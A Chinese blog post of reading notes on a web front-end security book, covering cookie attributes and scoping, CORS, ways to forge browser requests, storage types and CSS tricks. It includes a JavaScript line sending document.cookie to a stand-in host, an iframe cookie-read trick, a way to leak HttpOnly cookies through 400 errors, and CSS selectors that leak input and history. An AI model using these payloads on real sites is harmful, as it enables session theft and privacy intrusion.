本文地址：http://www.reibang.com/p/16500959dec0

第二章

HTTP

Set-Cookie： 每個 Set-Cookie設(shè)置一個Cookie，如下示例：

Set-Cookie: PTOKEN=; expires=Mon, 01 Jan 1970 00:00:00 GMT; path=/; domain=.foo.com; httpOnly; Secure;

Set-Cookie: USERIDPT=C93984899D983; expires=Mon, 01 Jan 1970 00:00:00 GMT; path=/; domain=.foo.com;

• expires：過期時間，如果是過去時間箱舞，表明這個Cookie要被刪掉
• path:相對路徑，只有這個路徑下的資源可以訪問這個Cookie
• domain: 域名掏导，有權(quán)限設(shè)置為更高一級的域名
• HttpOnly:標志（默認無，若有表明Cookie存在于HTTP層面羽峰，不能被客戶端腳本讀到）
• Secure: 標志（默認無趟咆，若有表明Cookie僅通過HTTPS協(xié)議傳輸）

iframe:不同域時，子頁面可以修改父頁面location.href梅屉，但是不能讀戎瞪础；

跨轉(zhuǎn)請求（CORS）

通過給目標域添加 Access-Control-Allow-Origin

如果不設(shè)置Access-Control-Allow-Origin:http://www.foo.com坯汤，數(shù)據(jù)依然可以被偷到虐唠。雖然瀏覽器會報錯，但目標域依然可以接受到

默認情況下惰聂，這樣的跨域無法帶上目標域的會話疆偿，前端需要設(shè)置 XHR 的 withCredentials 為 true妈橄，同時目標域必須設(shè)置如下：

<?php
header('Access-Control-Allow-Origin: http://www.foo.com');
header('Access-Control-Allow-Credentials: true'); // 允許跨域證書發(fā)送
// ...
?>

模擬用戶發(fā)瀏覽器請求

第一種 通過js動態(tài)創(chuàng)建iframe/frame/script/link/img等標簽，然后將他們的src或href屬性指向目標地址

var cookie = escape(document.cookie);
new Image().src = 'http://localhost/?'+cookie;
// 或(會跳頁面)
location.href='http://localhost/?'+cookie;

第二種 通過創(chuàng)建XHR發(fā)送同步或異步請求

默認POST提交的 Content-Type 為 application/x-www-urlencoded翁脆，還有一種常見的 multipart/form-data ，一般有文件上傳時用這種

第三種 通過原生form表單鼻种，常用于 CSRF 攻擊

通過創(chuàng)建 form反番、input等標簽，然后設(shè)置form的 form.action="http://localhost/..."叉钥，調(diào)用 form.submit() 提交表單

Cookie

1. 子域Cookie機制

• 不指定domain時罢缸，默認為當前域

// 當前域為foo.test.com 時候，domain為foo.test.com
document.cookie='test=1;'

• 可以設(shè)置上級根域投队，向下不行枫疆，好處是不同子域可以共享 Cookie，但也會造成攻擊

如當前域名為 foo.test.com

// 可行
document.cookie='test=1;domain=test.com;'

//不可行
document.cookie='test=1;domain=bar.foo.test.com;'

2. 路徑Cookie機制

• 設(shè)置Cookie如果不指定path的值敷鸦，默認為當前頁面的路徑

如：a.foo.com/admin/index.php 頁面下設(shè)置Cookie息楔，path的值為 /admin/

• 不同路徑下Cookie不能互相讀取，可以借助iframe的DOM操作即可

var src = '....';
var iframe = document.createElement('iframe');
iframe.src = src;
iframe.onload = function(){
    var doc = iframe.contentDocument || iframe.contentWindow.document;
    console.log(doc.cookie);
}

3. HttpOnly Cookie機制

• 添加HttpOnly標志后扒披，僅在 HTTP層面?zhèn)鬏斨狄溃琂S獲取不到

以PHP為例

<?php
// 設(shè)置普通Cookie
setcookie('test', 1, time() + 3600, "", "", 0);

// 第七個參數(shù)是HttpOnly標志，1為開啟碟案，0為關(guān)閉
setcookie('test', 1, time() + 3600, "", "", 0, 1);
?>

• 服務(wù)端報錯時可能會拋出相關(guān)Cookie信息愿险，尤其是400錯誤

所以模擬一個400請求，通過解析響應(yīng)就可以得到 HttpOnly 的Cookie

4. Secure Cookie機制

• Cookie只能在 HTTPS層面?zhèn)鬏?/li>
• js可以讀取 Secure Cookie 价说，當然就可以篡改

// path與domain必須一致辆亏，否則為不同Cookie
document.cookie = 'test=1;path=/;secure;';

5. 本地Cookie與內(nèi)存Cookie

• 與 expires 緊密相關(guān)，沒設(shè)置過期時間為內(nèi)存Cookie鳖目，瀏覽器關(guān)閉就消失扮叨；設(shè)置了為本地Cookie，為以文本形式保存在本地领迈，到期后自動消失

• 可以修改內(nèi)存Cookie為本地Cookie甫匹，安全的核心在于服務(wù)端校驗，合法性惦费、唯一性兵迅、是否被篡改等

6. Cookie的P3P性質(zhì)

P3P（Platform for Privacy Preferences Project）為HTTP響應(yīng)頭的一個字段，為W3C公布的一項隱私保護推薦標準薪贫，用于標示是否允許目標網(wǎng)站的Cookie被另一個域通過加載目標網(wǎng)站而設(shè)置或發(fā)送恍箭，僅IE執(zhí)行了該策略（具體參考書本 P41）

幾種存儲方式比較

• Cookie

一般50個，最新chrome可以存170個瞧省，每個最大4K扯夭。超過會被刪除一些鳍贾。刪除方式是設(shè)置過期時間即可。無法跨瀏覽器

• userDate

IE中持久存儲交洗，最大64K左右

• localStorage\sessionStorage

區(qū)別是localStorage一直生效骑科，sessionStorage在關(guān)閉瀏覽器時會刪除，用法兩種一樣

• FlashCookie

跨瀏覽器通用解決方案构拳，默認存儲大小為100K

函數(shù)劫持

js劫持只需重寫這個函數(shù)即可

CSS偽裝

通過設(shè)置偽類可以出發(fā)請求

// 可以知道瀏覽器是否訪問過 http://google.com
a:visited{
    background:url(http://google.com)
}

// 用戶在input表單中輸入a開頭就會發(fā)送一個請求
input[value^='a']{
    background:url(http://google.com);
}

// 鼠標選擇就會發(fā)送請求
#select::selection{
    background:url(http://google.com)
}

// ...

附原書購買地址： http://item.jd.com/11181832.html